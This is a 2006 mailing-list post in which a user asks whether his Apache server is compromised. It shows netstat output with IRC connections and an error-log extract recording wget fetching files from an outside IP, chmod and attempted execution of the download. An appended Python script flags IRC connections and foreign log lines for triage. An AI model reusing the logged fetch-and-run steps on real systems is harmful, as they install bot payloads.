[H-GEN] apache2 compromised or just attempts?

Troy Piggins troy at piggo.com
Sun May 28 18:51:03 EDT 2006


A few weeks ago I came home after a few days away and was having some problems
with my ubuntu server.  I noticed that the disk space was at 100% full.  Weird,
it is a 38Gb partition and has never been over 15% used.

After some scrounging around I found that my most recent apache2 error log was
about 32Gb!  Looked like some turkey had been trying repeatedly, and
repeatedly, to hack my web server. [1]

I compressed that log file and the system worked fine again.

Yesterday the web server stopped working.  It is not showing up in 'pstree'.
Looking at netstat, this is the (worrying) output:

-----8<-----
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
tcp        0      0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:43411         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:55893         lemming.euronet.nl:ircd ESTABLISHED
tcp        0      0 10.1.1.11:47631         checkip.chi.dyndns.:www CLOSE_WAIT
tcp        0      0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
tcp        1      0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
[snip]
-----8<-----

10.1.1.11 is my ubuntu machine's ip address of its wireless card connection to
my wireless modem/router.

What the hell are those ircd entries?  Am I compromised?  What is my next step?

[1] extract of /var/log/apache1/error.log.4.gz

-----8<-----
[Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script '/var/www/thisdoesnotexistahaha.php' not found or unable to stat
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/pub/horde-cvs
--20:41:57--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = "en_US",
        LC_ALL = (unset),
        LANG = "en_US"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Can't open perl script "temp2006": No such file or directory
--20:41:57--  http://81.58.26.26/libsh/ping
           => `ping'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 (15K) [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: invalid mode string: `x'
sh: ./ping: No such file or directory
sh: curl: command not found
-----8<-----

-- 
Troy Piggins
  ,-o    Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
 o   )   postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
  `-o    slrn 0.9.8.1/rt (score_color patch), vim 7.0
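A first triage check for the two things the post shows, added here as an example and not part of Troy's message: it flags established connections to IRC service names or ports in netstat output, and lines in Apache's error.log that are not in Apache's own format (wget, perl and shell messages there mean something spawned by the web server wrote to its stderr). The sample lines are constructed from the post, and the IRC port list is an assumption.

```python
import re

# Constructed sample modelled on the netstat output in the post.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:47631         checkip.chi.dyndns.:www CLOSE_WAIT
tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
"""

# Constructed sample modelled on the error.log extract in the post.
ERRORLOG_SAMPLE = """\
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
--20:41:57--  http://81.58.26.26/libsh/ping.txt
Cannot write to `ping.txt' (Permission denied).
sh: curl: command not found
"""

# Assumed list: the 'ircd' service name plus the usual IRC port range.
IRC_PORTS = {"ircd", "7000"} | {str(p) for p in range(6660, 6670)}

# Apache 1.3/2.0 error-log prefix: "[Mon May 01 15:38:12 2006] [error]".
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} \d{2} \d{2}:\d{2}:\d{2} \d{4}\] \[\w+\]")


def irc_connections(netstat_text):
    """Return (local, foreign) pairs for ESTABLISHED TCP connections whose
    foreign port is an IRC service name or a common IRC port number."""
    hits = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6"):
            continue  # header line or a non-TCP row
        local, foreign, state = parts[3], parts[4], parts[5]
        port = foreign.rsplit(":", 1)[-1]
        if state == "ESTABLISHED" and port in IRC_PORTS:
            hits.append((local, foreign))
    return hits


def foreign_log_lines(log_text):
    """Return non-empty error.log lines that lack Apache's log prefix; these
    are stderr output from a child process, not messages Apache wrote."""
    return [l for l in log_text.splitlines() if l and not APACHE_LINE.match(l)]


if __name__ == "__main__":
    for local, foreign in irc_connections(NETSTAT_SAMPLE):
        print("IRC connection:", local, "->", foreign)
    for line in foreign_log_lines(ERRORLOG_SAMPLE):
        print("non-Apache line in error.log:", line)
```

Run it against the live output of `netstat -tn` and the uncompressed error.log to get the full list before deciding whether to rebuild the box.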
